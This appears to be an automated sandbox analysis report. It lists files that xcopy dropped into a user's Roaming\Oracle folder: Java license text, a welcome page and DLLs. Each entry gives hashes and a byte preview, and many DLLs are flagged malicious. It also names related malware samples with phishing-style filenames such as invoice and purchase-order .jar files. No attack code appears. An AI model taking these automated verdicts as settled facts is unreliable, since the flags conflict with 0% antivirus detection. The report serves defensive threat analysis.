                                                                                                                                                                                                                                  Entropy (8bit):4.503253675672093
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:3:YOc6XJKoQAEkBAzprMC9iRFGEjS1FfJGHmEhQhMy8yA/MGuPX+WJg6HY4AXe8rAv:e8EoQLkBAdrMC9iRVjMFwGyQhMBy4Hov
                                                                                                                                                                                                                                  MD5:F3AF2718F86B00497FA423046F50CEE6
                                                                                                                                                                                                                                  SHA1:0FF70AAD905069978C0D83728621FC982FD492FA
                                                                                                                                                                                                                                  SHA-256:4E4079BD53B742D9D6F18FBD06F743C28285F1E4B9FFD636D2D24A70A2EE7F00
                                                                                                                                                                                                                                  SHA-512:FFA6A3098182084D9D563274BD30C5F55EA0F7C9F9AB4DC8CD1664B971D0CF03BFC8061E19D1BDA6A4591B100A87B74F26AA1BDBFECCBC1EA195AF809A8C49FA
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:The licenses for Third Party components included with this product can.be found under the /legal/javafx subdirectory. Each component's license.is available as a separate markdown (.md) file.

                                                                                                                                                                                                                                  C:\Users\user\AppData\Roaming\Oracle\THIRDPARTYLICENSEREADME.txt

                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):190
                                                                                                                                                                                                                                  Entropy (8bit):4.470612255387289
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:3:YOc6XJKoQAEkBAzprMC9iRFGEuFDKQ1FfJGHmBO8Ly8yA/MGujcWJg6HY4AXe8rg:e8EoQLkBAdrMC9iRVKlFwGBO8By4Hogk
                                                                                                                                                                                                                                  MD5:59E82B41579AD2E2016D98F191C8D5FF
                                                                                                                                                                                                                                  SHA1:BD9F7A797E0FCA53892F9FC5EA87727D8DA41DA5
                                                                                                                                                                                                                                  SHA-256:7D7336CC8FA87C4629EAC7F0EFCBF12E5C975AC9EE44CD1343A0EA68A813DDCA
                                                                                                                                                                                                                                  SHA-512:32393B417E62F1399C6F1754CC8F3001689593A6B59569885FDFE0F1478018C81222C8B82DADFC0E514659DAA01D819CE79FAA53969BEAEFD438D15C9DF5B9C5
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:The licenses for Third Party components included with this product can .be found under the /legal/jdk subdirectory. Each component's license is .available as a separate markdown (.md) file..

                                                                                                                                                                                                                                  C:\Users\user\AppData\Roaming\Oracle\Welcome.html

                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                                                                                                                  File Type:HTML document, ASCII text
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):955
                                                                                                                                                                                                                                  Entropy (8bit):5.088468206037393
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:24:INMTdqcxtK4jXQ5VaJ2gjQo4pDW94QDJn:TTdqIK4jXjJdso4V7O
                                                                                                                                                                                                                                  MD5:B292AE0FB1B4F20A7D0F8791AF97DB50
                                                                                                                                                                                                                                  SHA1:476FECD1D9B61151A1FF622454C8095E41CA5178
                                                                                                                                                                                                                                  SHA-256:B95219F315577A786EA61060252B1FCD8BBF1266003F3F045C5D1FE612DBE87B
                                                                                                                                                                                                                                  SHA-512:1BC45E9453F70ABF7625C3A0F6506C22CB3DE10CA4005A97DF460B14A174C0484E0994AF63978151CF5436EDAF77519151DD9A0606764E2426707457B13828A7
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:<html>.<head>.<title>.Welcome to the Java(TM) Platform.</title>.</head>.<body>..<h2>Welcome to the Java<SUP><FONT SIZE=-2>TM</FONT></SUP> Platform</h2>.<p> Welcome to the Java<SUP><FONT SIZE=-2>TM</FONT></SUP> Standard Edition Runtime . Environment. This provides complete runtime support for Java applications. .<p> The runtime environment includes the Java<SUP><FONT SIZE=-2>TM</FONT></SUP> . Plug-in product which supports the Java environment inside web browsers. .<h3>References</h3>.<p>.See the <a href="http://download.oracle.com/javase/7/docs/technotes/guides/plugin/">Java Plug-in</a> product.documentation for more information on using the Java Plug-in product..<p> See the <a href=."http://www.oracle.com/technetwork/java/javase/overview/".>Java Platform</a> web site for . more information on the Java Platform. .<hr>.<font size="-2">.Copyright (c) 2006, 2023, Oracle and/or its affiliates. All rights reserved..</font>.<p>.</body>.</html>.

                                                                                                                                                                                                                                  C:\Users\user\AppData\Roaming\Oracle\bin\API-MS-Win-core-xstate-l2-1-0.dll

                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):11232
                                                                                                                                                                                                                                  Entropy (8bit):6.843306475803262
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:192:3f5b6WthWxWf9BvVVWQ4SWUWPxgKtkqnajOyr39+:3f5b6WthWkNW0lqyrc
                                                                                                                                                                                                                                  MD5:42A40EC9ADDF68F5B66878FED7C9A8A6
                                                                                                                                                                                                                                  SHA1:339A41043F7DD28CADF8CA6A578B292351EB3565
                                                                                                                                                                                                                                  SHA-256:8594D0EDA4E4367BC3473032552C5D0F9931C283E6C4CB8D7C1E7D9F61E13506
                                                                                                                                                                                                                                  SHA-512:84826C1C35DEFEBE8D5A3DD7EF8C14C8BCBDBC51AB34062F65565680D133AD5DF443F0F8BDB84D09838D1169B34092A06AAD3A795EE214252097022BEA83E4C6
                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                  • Antivirus: Virustotal, Detection: 0%, Browse
                                                                                                                                                                                                                                  Joe Sandbox View:
                                                                                                                                                                                                                                  • Filename: gcahfpmhcn.js, Detection: malicious, Browse
                                                                                                                                                                                                                                  • Filename: FACTURA.jar, Detection: malicious, Browse
                                                                                                                                                                                                                                  • Filename: FEDEX-TNT OVERDUE UNPAID INVOICE980055177856..jar, Detection: malicious, Browse
                                                                                                                                                                                                                                  • Filename: SecuriteInfo.com.Trojan.Siggen22.58997.11289.5716.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                  • Filename: Purchase Orders-Reg.jar, Detection: malicious, Browse
                                                                                                                                                                                                                                  • Filename: SecuriteInfo.com.Trojan.Siggen23.5328.29386.24001.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                  • Filename: SecuriteInfo.com.BScope.Adware.Softcnapp.31344.28361.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                  • Filename: SecuriteInfo.com.BScope.Adware.Softcnapp.31344.28361.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                  • Filename: Swift Advice $31,470.00.jar, Detection: malicious, Browse
                                                                                                                                                                                                                                  • Filename: 4.jar, Detection: malicious, Browse
                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$............be..be..be...e..be...a..be......be...g..be.Rich.be.PE..L....A.m...........!......................... ...............................0......j.....@......................... ................ ...................!..............T............................................................................text............................... ..`.rsrc........ ......................@..@.....A.m........:...T...T........A.m........d................A.m........$...........RSDS.WJ....@l.....*....api-ms-win-core-xstate-l2-1-0.pdb...........T....rdata..T........rdata$zzzdbg... ........edata... ..`....rsrc$01....` .......rsrc$02.... ....WJ....@l.....*......<9.....A.m.............A.m....................H...`...x...............I...x...................7...d...................api-ms-win-core-xstate-l2-1-0.dll.CopyContext.kernel32.CopyContext.GetEnabledXStateFeatures.kernel32

                                                                                                                                                                                                                                  C:\Users\user\AppData\Roaming\Oracle\bin\JAWTAccessBridge-32.dll

                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):20608
                                                                                                                                                                                                                                  Entropy (8bit):6.68243370783467
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:384:a51KAJhDgjmd0om+oPuqqvIYi1o0zPxh8E9VF0NyfhSq:TArD7G/RPuqqQYirPxWEFL
                                                                                                                                                                                                                                  MD5:D175B83196887F8655E9F363A7F96DCB
                                                                                                                                                                                                                                  SHA1:E5D57A7F98B622F8936965D013832804CDACAA6E
                                                                                                                                                                                                                                  SHA-256:708893FAC23F5CE8CEC5A70BF315DD92DA8D0A39C81EF6AA6AD79A984AF56BCA
                                                                                                                                                                                                                                  SHA-512:029679C68B19F05E0AA1A254E39FB233D8B34709E9CAF42E08316E420412DB44C714AD5ED7362233E1F479EFC402B8C306097ADC8BF872CE7B1987F50806F6B3
                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                  • Antivirus: Virustotal, Detection: 0%, Browse
                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......................................i...............i....i....i.q...i....Rich..........PE..L.....d...........!......................... ...............................`............@..........................%.......&..d....@..x............(...(...P..@...h!..T............................ ..@............ ..l............................text...k........................... ..`.rdata....... ......................@..@.data........0......................@....rsrc...x....@......................@..@.reloc..@....P.......&..............@..B........................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                  C:\Users\user\AppData\Roaming\Oracle\bin\JavaAccessBridge-32.dll

                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):141440
                                                                                                                                                                                                                                  Entropy (8bit):6.517487882695378
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:3072:8xOWSOU82zuwaiEKrK57izD0O/7NY7wYLtyLdwFxnBiKzXHAE/qnvRhGmPtGeKQO:UORVPD0g0+KQMUQ
                                                                                                                                                                                                                                  MD5:D37273185598543240BEF397E7165555
                                                                                                                                                                                                                                  SHA1:84501840AF96EE948207E6D86DB8B8DDA3C383E3
                                                                                                                                                                                                                                  SHA-256:DEA7E9878D59640B2F0B53EA7977A9D4AA11E35E32E9D2BCC0D539FB59AF533F
                                                                                                                                                                                                                                  SHA-512:B3A22879B775FCF0438D9FB23F59EEB5BB3A35D125450521E6DA40EF03E5E74A94905265129FB20AD2967B45D276DFBC57E047BD386C14819E485CC1225221E3
                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                  • Antivirus: Virustotal, Detection: 0%, Browse
                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........:.b.[.1.[.1.[.1.#Z1.[.1.#.0.[.1.#.0.[.1.#.0.[.1.#.0.[.1.0.0.[.1.[.1.[.1|".0.[.1|".0.[.1|"61.[.1|".0.[.1Rich.[.1........................PE..L...|.d...........!.........(...............................................0.......\....@.................................h...........x................(... ......H...T...............................@...............$............................text............................... ..`.rdata..............................@..@.data...4...........................@....rsrc...x...........................@..@.reloc....... ......................@..B................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                  C:\Users\user\AppData\Roaming\Oracle\bin\WindowsAccessBridge-32.dll

                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):170624
                                                                                                                                                                                                                                  Entropy (8bit):6.725061320371206
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:3072:I8tq5j1I/m9FRzefP2UADrWjXdpE5u0o+EH7eg+SSgpcC/ltFgxX:I8A5jK/URymDr+zE55E7bHK
                                                                                                                                                                                                                                  MD5:8A2486499C94AF35C171CA27D6C46053
                                                                                                                                                                                                                                  SHA1:8EF0B4AB966A885BA6C5BAE677EEC3C6854CFAB9
                                                                                                                                                                                                                                  SHA-256:D4DE3DDEB86432F14E3123F2BE6E599FC29534002CDC804EA808C1A638AC10FC
                                                                                                                                                                                                                                  SHA-512:622101FAF662262D04E8D138E6780A126414042D3516CDF169F8DAEE7C8D821BDC396321F538FCE41E0ED5CD8F4EB162718E8335CEB8020C38A6C4E8DA510182
                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                  • Antivirus: Virustotal, Detection: 0%, Browse
                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......ZA.2. .a. .a. .a.K.`. .a.K.`. .a.K.`. .a|X.`. .a|X.`. .a|X.`= .a.K.`. .a. .a. .a.Y.`. .a.Y.`. .a.YOa. .a.Y.`. .aRich. .a................PE..L...|.d...........!................Kw....................................................@..........................M..D....\..<....................r...(...........B..T............................A..@...............\............................text............................... ..`.rdata.............................@..@.data...T....p.......J..............@....rsrc................T..............@..@.reloc...............\..............@..B................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                  C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-core-console-l1-1-0.dll

                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):11744
                                                                                                                                                                                                                                  Entropy (8bit):6.773528673083833
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:192:icWthWLEWf9BvVVWQ4SWjbg4rmuUgxfzfqnaj0OqWq15:/WthWFN8g4GIrlo0A5
                                                                                                                                                                                                                                  MD5:501EF92789251F51312BD6D91EBB2E3A
                                                                                                                                                                                                                                  SHA1:2547C014A19CB0E06CE82F9132AB25898EE6B034
                                                                                                                                                                                                                                  SHA-256:213CDEFFC15C734E42565C90512491113652DE9E52694AE335131D0E24F91DF7
                                                                                                                                                                                                                                  SHA-512:C87327C7D8385C10B203133920D6BF0C945CD9F9CD7213C2F70C2A756A4EA0A42205D6DF5BD38B028F5CC41D1311B7EAAB8B340634F7C9B582255B8EFFBD389A
                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                  • Antivirus: Virustotal, Detection: 0%, Browse
                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$............be..be..be...e..be...a..be......be...g..be.Rich.be.PE..L..................!......................... ...............................0......?J....@......................... ...+............ ...................!..............T............................................................................text...K........................... ..`.rsrc........ ......................@..@................;...T...T...................d...........................$...........RSDS...p.8.q.}.2.).....api-ms-win-core-console-l1-1-0.pdb..........T....rdata..T........rdata$zzzdbg... ...+....edata... ..`....rsrc$01....` .......rsrc$02.... ......p.8.q.}.2.)..cx..A....I........................................H...............'...L...w...............:...g...................4...........=...d...............(...U...................&...............................api-ms-win-core-cons

                                                                                                                                                                                                                                  C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-core-console-l1-2-0.dll

                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):11744
                                                                                                                                                                                                                                  Entropy (8bit):6.823598871593883
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:192:ItsWthWQWf9BvVVWQ4SWmHJ0T7ssmsqnajrQgvNFx:I+WthW1NRKss9lPQ8
                                                                                                                                                                                                                                  MD5:D6C4BBCC368C0A6FF00DE4A274CE8B37
                                                                                                                                                                                                                                  SHA1:C87FFE41CC22CF525A7DC4866B88FD98D1C47923
                                                                                                                                                                                                                                  SHA-256:45A155E9B60F068FBC3EA8DD73552905AFEAE49270BEA6BBCCB4AAD0AA696F2D
                                                                                                                                                                                                                                  SHA-512:2D3CFCB70E1E26156FCF5200A491419A48BBEC903C408FBCC4F6D7D5235DA627E6FB45678C47A241A1C7D3C159300955B535086BBE27713EBAA463E79287F5B8
                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                  • Antivirus: Virustotal, Detection: 0%, Browse
                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$............be..be..be...e..be...a..be......be...g..be.Rich.be.PE..L...y.............!......................... ...............................0............@......................... ................ ...................!..............T............................................................................text............................... ..`.rsrc........ ......................@..@....y..........;...T...T.......y..........d...............y..........$...........RSDSP....0.......I|.....api-ms-win-core-console-l1-2-0.pdb..........T....rdata..T........rdata$zzzdbg... ........edata... ..`....rsrc$01....` .......rsrc$02.... ...P....0.......I|.....q...W..6y..............y......................H..........."...F...i...................N...{............... ...L...z...............8...]...~...............<...i...................6...k...................................

                                                                                                                                                                                                                                  C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-core-datetime-l1-1-0.dll

                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):11232
                                                                                                                                                                                                                                  Entropy (8bit):6.79323921043045
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:192:70WthW3Wf9BvVVWQ4SWFfOwsmsqnajrQjtFJcnn1:70WthWKNMs9lPQjDM1
                                                                                                                                                                                                                                  MD5:247EE0EC4475C244EFC4204B4DD0F6DA
                                                                                                                                                                                                                                  SHA1:A05C0D6A8EB1D76642EAF38A316785394F43B737
                                                                                                                                                                                                                                  SHA-256:05BACCF67FC6360068A9836A1A5EBF0E62697E92990665A6B73CE6C8A4A1B633
                                                                                                                                                                                                                                  SHA-512:51E1D4EDFD44908F81498506B007DBC25DD1F88440FD06B692EC90863F100DD8DB196B890520460C9B41F571ABE828D54085148C71714F32DBDDEA01CD8C597B
                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                  • Antivirus: Virustotal, Detection: 0%, Browse
                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$............be..be..be...e..be...a..be......be...g..be.Rich.be.PE..L....[.^...........!......................... ...............................0.......C....@......................... ................ ...................!..............T............................................................................text...0........................... ..`.rsrc........ ......................@..@.....[.^........<...T...T........[.^........d................[.^........$...........RSDSf.....M`..fH......api-ms-win-core-datetime-l1-1-0.pdb.........T....rdata..T........rdata$zzzdbg... ........edata... ..`....rsrc$01....` .......rsrc$02.... ...f.....M`..fH....W(...ZC....[.^.............[.^....p...............H...X...h...........................................api-ms-win-core-datetime-l1-1-0.dll.GetDateFormatA.kernel32.GetDateFormatA.GetDateFormatW.kernel32.GetDateFormatW.GetTim

                                                                                                                                                                                                                                  C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-core-debug-l1-1-0.dll

                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):11224
                                                                                                                                                                                                                                  Entropy (8bit):6.8026317072916545
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:192:RWthW9Wf9BvVVWQ4SWPIxf2LfvXqnajJ6Hp/u:RWthW4Npxf2LXll6Hdu
                                                                                                                                                                                                                                  MD5:2E73BB0452F6C5C9DE3157DFF1997B65
                                                                                                                                                                                                                                  SHA1:BF2D5386113120823245F35FAABC642107707D63
                                                                                                                                                                                                                                  SHA-256:1C2705257C272C7736EF10B81D65F28FC76B4D34412B8DB72F5A23B530D847E8
                                                                                                                                                                                                                                  SHA-512:6FD865037DE04219EE01375B3DA9BEEC1EC29720D8CA16094AD64BD089CC7F8B47A025A0D1F746DE7E718492EF1D97E9622F886BDCC3DD76771DD13D76CB3693
                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                  • Antivirus: Virustotal, Detection: 0%, Browse
                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$............be..be..be...e..be...a..be......be...g..be.Rich.be.PE..L....zR............!......................... ...............................0.......@....@......................... ................ ...................!..............T............................................................................text...;........................... ..`.rsrc........ ......................@..@.....zR.........9...T...T........zR.........d................zR.........$...........RSDS..._r.....BY.@;....api-ms-win-core-debug-l1-1-0.pdb............T....rdata..T........rdata$zzzdbg... ........edata... ..`....rsrc$01....` .......rsrc$02.... ......_r.....BY.@;"....,.Q..w..zR..............zR.....p...............H...X...h...........................................api-ms-win-core-debug-l1-1-0.dll.DebugBreak.kernel32.DebugBreak.IsDebuggerPresent.kernel32.IsDebuggerPresent.OutputDebug

                                                                                                                                                                                                                                  C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-core-errorhandling-l1-1-0.dll

                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):11232
                                                                                                                                                                                                                                  Entropy (8bit):6.851667373833437
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:192:XamxD33WthW6Wf9BvVVWQ4SW1FytijpC52qnajABI19CVew:XaUWthW3N/ANlse1Qsw
                                                                                                                                                                                                                                  MD5:C17D0AD1FA14E8D6F200A5C56B1A1471
                                                                                                                                                                                                                                  SHA1:B0BCCB0B0B4D376CBB21EB26FCAC4533983B2E0A
                                                                                                                                                                                                                                  SHA-256:8B3669326BB61770FB013E4D9A9E1722A1C6E4699BE4EB61A620BDB64871CB78
                                                                                                                                                                                                                                  SHA-512:659F392489FD927D010CF9F59197F68AC6FF38570B8582B795E6FDEC5EABAAC2F9ADAA742FAC914032FE7D308C182FC2029050D1E5461218128C18E37DC6EF90
                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                  • Antivirus: Virustotal, Detection: 0%, Browse
                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$............be..be..be...e..be...a..be......be...g..be.Rich.be.PE..L.....g...........!......................... ...............................0............@......................... ................ ...................!..............T............................................................................text............................... ..`.rsrc........ ......................@..@......g........A...T...T.........g........d.................g........$...........RSDS...WS.....N......api-ms-win-core-errorhandling-l1-1-0.pdb............T....rdata..T........rdata$zzzdbg... ........edata... ..`....rsrc$01....` .......rsrc$02.... ......WS.....N.......Q....G...g......g....................H...d...................1...T.......................$...G...j.....................api-ms-win-core-errorhandling-l1-1-0.dll.GetErrorMode.kernel32.GetErrorMode.GetLastError.k

                                                                                                                                                                                                                                  C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-core-file-l1-1-0.dll

                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):14816
                                                                                                                                                                                                                                  Entropy (8bit):6.692569650542529
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:192:tCYYPvVX8rFTsdWthWaWf9BvVVWQ4SWouFD16jpC52qnajABI1wR:tC7PvVXvWthWXNGeNlse10
                                                                                                                                                                                                                                  MD5:BC38504B2764C4BB7E676B1437CC22A3
                                                                                                                                                                                                                                  SHA1:EF1B33CC2DFBACEB22AF08B6CAA53C2F74F760DD
                                                                                                                                                                                                                                  SHA-256:6FF3EBD6589CC824E00A9FC548CFCAF8221E046A07F9FB822900D288B9010A2D
                                                                                                                                                                                                                                  SHA-512:6EDB22AB8BEB58BB3BCA1D6E10AAED76CA79226174ACDAAE591CA4817631B4262770BF9F8A2EA191593973A6D4D1510EBB7C0ECA04E10464C203FAA5D2D6DA9A
                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                  • Antivirus: Virustotal, Detection: 0%, Browse
                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$............be..be..be...e..be...a..be......be...g..be.Rich.be.PE..L....V.............!.........................0...............................@......^X....@......................... ................0...................!..............T............................................................................text...'........................... ..`.rsrc........0......................@..@.....V..........8...T...T........V..........d................V..........$...........RSDS..".ag.....A......api-ms-win-core-file-l1-1-0.pdb.........T....rdata..T........rdata$zzzdbg... ........edata...0..`....rsrc$01....`0.......rsrc$02.... .....".ag.....A......;-...P.V...................V......6.......K...K...H...t.......f...................(...N...o.............../...q...............=...f...................B...k...............!...P...y...............,...]...................+...

                                                                                                                                                                                                                                  C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-core-file-l1-2-0.dll

                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):11232
                                                                                                                                                                                                                                  Entropy (8bit):6.825425081064529
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:192:yaHNWthWGWf9BvVVWQ4SWtKGpzjpC52qnajABI1QOg:/NWthWrN6Nlse1Y
                                                                                                                                                                                                                                  MD5:7D64AEFB7E8B31292DA55C6E12808CDB
                                                                                                                                                                                                                                  SHA1:568C2A19A33BB18A3C6E19C670945630B9687D50
                                                                                                                                                                                                                                  SHA-256:62A4810420D997C7FDD9E86A42917A44B78FB367A9D3C0A204E44B3FF05DE6D4
                                                                                                                                                                                                                                  SHA-512:68479DA21F3A2246D60DB8AFD2AE3383A430C61458089179C35DF3E25CA1A15EBA86A2A473E661C1364613BAA93DCB38652443EB5C5D484B571AB30728598F9B
                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                  • Antivirus: Virustotal, Detection: 0%, Browse
                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$............be..be..be...e..be...a..be......be...g..be.Rich.be.PE..L.....<G...........!......................... ...............................0............@......................... ...L............ ...................!..............T............................................................................text...l........................... ..`.rsrc........ ......................@..@......<G........8...T...T.........<G........d.................<G........$...........RSDS.wv<.....B..6..T....api-ms-win-core-file-l1-2-0.pdb.........T....rdata..T........rdata$zzzdbg... ...L....edata... ..`....rsrc$01....` .......rsrc$02.... ....wv<.....B..6..T.q....._5.GA..<G..................<G....p...............H...X...h...............B...............!...........api-ms-win-core-file-l1-2-0.dll.CreateFile2.kernel32.CreateFile2.GetTempPathW.kernel32.GetTempPathW.GetVolumeNameForVolu

                                                                                                                                                                                                                                  C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-core-file-l2-1-0.dll

                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):11232
                                                                                                                                                                                                                                  Entropy (8bit):6.918894098613097
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:192:9WthWmWf9BvVVWQ4SW7JXSFsmsqnajrQAIf:9WthWLNi2s9lPQ3
                                                                                                                                                                                                                                  MD5:DCD09014F2B8041E89270FECD2C078B2
                                                                                                                                                                                                                                  SHA1:B9F08AFFDD9FF5622C16561E6A6E6120A786E315
